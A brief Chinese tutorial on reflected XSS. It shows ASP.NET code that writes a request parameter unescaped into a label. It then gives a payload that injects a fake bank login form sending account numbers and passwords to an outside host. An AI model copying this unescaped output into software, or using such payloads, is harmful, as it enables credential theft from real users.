XSS漏洞攻击

源页面放一个标签，在后台Page_Load里面写this.textLabel.Text = Request["Msg"];

构建攻击，让攻击后把数据传递到目标页

构建代码如下：

Msg=<form action='http://www.shtarena.com' method='get'>银行账号:<input type='text' name='ID'/>密码:<input type='text' name='pwd'/><input type='submit' value='Login'/></form>

页面加载完毕后，执行Login

此时我们可以看到账户和密码传递到www.shtarena.com